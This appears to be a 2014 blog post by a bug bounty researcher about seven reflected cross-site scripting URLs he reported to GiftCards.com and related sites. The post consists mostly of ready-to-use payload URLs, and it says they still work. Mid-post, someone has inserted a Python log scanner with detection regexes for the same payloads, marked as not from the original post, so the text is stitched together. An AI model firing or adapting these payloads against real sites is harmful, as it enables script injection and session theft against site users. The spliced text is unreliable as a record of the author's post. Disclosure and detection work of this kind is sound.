
Feb 18: My experiences with the GiftCards.com Bug Bounty Program

Since November 2013 I have reported seven Cross-site Scripting vulnerabilities to the GiftCards.com Bug Bounty Program. Sadly, only one of them wasn't a duplicate :-/. Strange? Perhaps, but not impossible given the simplicity of the vulnerabilities.
 
But what I really don't understand: why do they still work to this day?
 
 
11/17/2013 Vulnerability #1: (DUP)
 
// Reflected Cross-site Scripting
 
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//

// Original advisory

http://insight-labs.org/?p=738
 
 
11/17/2013 Vulnerability #2: (OK – Reward or not ;-)
 
// Reflected Cross-site Scripting (tested with FF 25.0.1)
 
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

// Original Advisory

http://inj3ct0rs.com/exploit/description/19711
 
 
11/21/2013 Vulnerability #3: (DUP)
 
// Reflected Cross-site Scripting with SWF files (tested on Firefox 25.0.1)
 
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);

 
 
11/26/2013 Vulnerability #4: (DUP)
 
// Reflected Cross-site Scripting with IE10
 
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>
 
 
12/05/2013 Vulnerability #5:
 
// Reflected Cross-site Scripting with IE10
 
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>
 
 
 
12/05/2013 Vulnerability #6:
 
// Reflected Cross-site Scripting with IE10
 
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>
 
 
12/05/2013 Vulnerability #7:
 
// Reflected Cross-site Scripting with IE10
 
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>
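As an added example (not code from the original post), a small Python checker that flags the two request shapes shown above in web-server access logs: a null byte followed by a quote or tag in the query string, and a `.swf` resource whose parameters carry script. The sample log lines are constructed, and the marker patterns are a heuristic assumption, not a complete XSS signature.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (combined format), not real traffic.
# Lines 1 and 2 are benign; the rest mirror the request shapes disclosed above.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Feb/2014:07:05:01 +0100] "GET /signup HTTP/1.1" 200 5120
203.0.113.5 - - [18/Feb/2014:07:05:02 +0100] "GET /swf/elf.swf?va_link=http://www.giftcards.com/ HTTP/1.1" 200 900
203.0.113.9 - - [18/Feb/2014:07:05:03 +0100] "GET /order-status?%00%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120
203.0.113.9 - - [18/Feb/2014:07:05:04 +0100] "GET /swf/elf.swf?va_link=javascript:alert(document.domain); HTTP/1.1" 200 900
203.0.113.9 - - [18/Feb/2014:07:05:05 +0100] "GET /wp-content/plugins/audio-player/assets/player.swf?playerID=a%22))%7Dcatch(e)%7Balert(1)%7D// HTTP/1.1" 200 700
"""

# Request target from the quoted request line of a combined-format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# Shape 1: a NUL byte directly followed by a quote or angle bracket (the IE10
# truncation payloads on /order-status, /signup, /member, /group-gifts/...).
NULL_BYTE_BREAKOUT = re.compile(r'\x00\s*["\'<>]')
# Shape 2 (heuristic assumption): script handed to a Flash movie parameter,
# either a javascript: URI or a quote-then-bracket string break-out as used
# against player.swf / swfupload.swf. Legitimate playerID/movieName/va_link
# values are alphanumeric or plain URLs and match none of these.
SWF_SCRIPT_MARKERS = re.compile(
    r'(?:javascript\s*:|["\']\s*[)\]]|<script|alert\s*\(|catch\s*\()', re.I)


def classify_request(target: str) -> list[str]:
    """Return the labels of suspicious patterns found in one request target."""
    parts = urlsplit(target)
    # Decode percent-encoding once; also accept Apache's \x00 escape for a raw NUL.
    query = unquote(parts.query).replace(r'\x00', '\x00')
    findings = []
    if NULL_BYTE_BREAKOUT.search(query):
        findings.append("null-byte-breakout")
    if parts.path.lower().endswith(".swf") and SWF_SCRIPT_MARKERS.search(query):
        findings.append("swf-parameter-script")
    return findings


def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (path, findings) for every log entry that matches a pattern."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = classify_request(match.group(1))
        if findings:
            hits.append((urlsplit(match.group(1)).path, findings))
    return hits


if __name__ == "__main__":
    for path, findings in scan_log(SAMPLE_LOG):
        print(f"{path}: {', '.join(findings)}")
```

Run against real logs, the path list tells you whether the still-working endpoints above are being probed; a match is a reason to fix the reflection, not proof of compromise.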
 
 
Written by Stefan Schurtz in Bug Bounty
Tags for this article: advisory, bug bounty, cross site scripting, security, sicherheit, xss
Last edited on 18.02.2014 07:05
